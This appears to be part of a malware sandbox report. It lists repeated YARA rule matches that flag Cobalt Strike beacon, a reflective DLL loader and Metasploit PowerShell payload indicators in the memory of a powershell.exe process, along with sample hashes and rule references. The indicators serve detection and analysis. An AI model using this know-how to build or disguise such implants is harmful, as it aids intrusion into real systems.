                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Author: Florian Roth
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detects Reflective DLL injection artifacts | Author: ditekSHen
                      Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: CobaltStrike payload | Author: ditekSHen
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies CobaltStrike via unidentified function code | Author: unknown
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Rule for beacon reflective loader | Author: unknown
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects unmodified CobaltStrike beacon DLL | Author: yara@s3c.za.net
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Author: Florian Roth
                      Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Trojan_Raw_Generic_4 | Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON | Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR | Matched rule: Detects unmodified CobaltStrike beacon DLL | Author: yara@s3c.za.net
                      Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR | Matched rule: Metasploit Payloads - file msf-ref.ps1 | Author: Florian Roth
                      Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip | Author: Florian Roth
                      Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_0000022EFA0C0F34 CreateProcessAsUserA,GetLastError,GetLastError,CreateProcessA,GetLastError,GetCurrentDirectoryW,GetCurrentDirectoryW,CreateProcessWithTokenW,GetLastError,GetLastError,GetLastError,GetLastError | 0_2_0000022EFA0C0F34
                      Source: 3.ps1, type: SAMPLE | Matched rule: Msfpayloads_msf_ref | date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: amsi64_1900.amsi.csv, type: OTHER | Matched rule: Msfpayloads_msf_ref | date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_ee756db7 | os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_663fc95d | os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_f0b627fc | reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: Beacon_K5om | date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike_Unmodifed_Beacon | date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: Leviathan_CobaltStrike_Sample_1 | date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: crime_win32_csbeacon_1 | date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_ee756db7 | os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_663fc95d | os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_f0b627fc | reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Beacon_K5om | date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike_Unmodifed_Beacon | date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Leviathan_CobaltStrike_Sample_1 | date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: crime_win32_csbeacon_1 | date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: WiltedTulip_ReflectiveLoader | date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader | author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 0.2.powershell.exe.22efa0b0000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CobaltStrike | author = ditekSHen, description = CobaltStrike payload
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: WiltedTulip_ReflectiveLoader | date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader | author = ditekSHen, description = detects Reflective DLL injection artifacts
                      Source: 0.2.powershell.exe.22ef9b10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CobaltStrike | author = ditekSHen, description = CobaltStrike payload
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_CobaltStrike_ee756db7 | os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 0.2.powershell.exe.22efa0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                      Source: 0.2.powershell.exe.22ef9b10000.0.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_CobaltStrike_ee756db7 | os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_CobaltStrike_663fc95d | os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_CobaltStrike_f0b627fc | reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Beacon_K5om | date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: CobaltStrike_Unmodifed_Beacon | date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Leviathan_CobaltStrike_Sample_1 | date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: crime_win32_csbeacon_1 | date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: WiltedTulip_ReflectiveLoader | date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_CobaltStrike | author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_CobaltStrike_ee756db7 | os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_CobaltStrike_663fc95d | os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_CobaltStrike_f0b627fc | reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Beacon_K5om | date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: CobaltStrike_Unmodifed_Beacon | date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Leviathan_CobaltStrike_Sample_1 | date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: crime_win32_csbeacon_1 | date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: WiltedTulip_ReflectiveLoader | date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader | author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_CobaltStrike | author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_CobaltStrike_ee756db7 | os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_CobaltStrike_663fc95d | os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_CobaltStrike_f0b627fc | reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: CobaltStrike_Unmodifed_Beacon | date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: WiltedTulip_ReflectiveLoader | date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Trojan_Raw_Generic_4 | date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
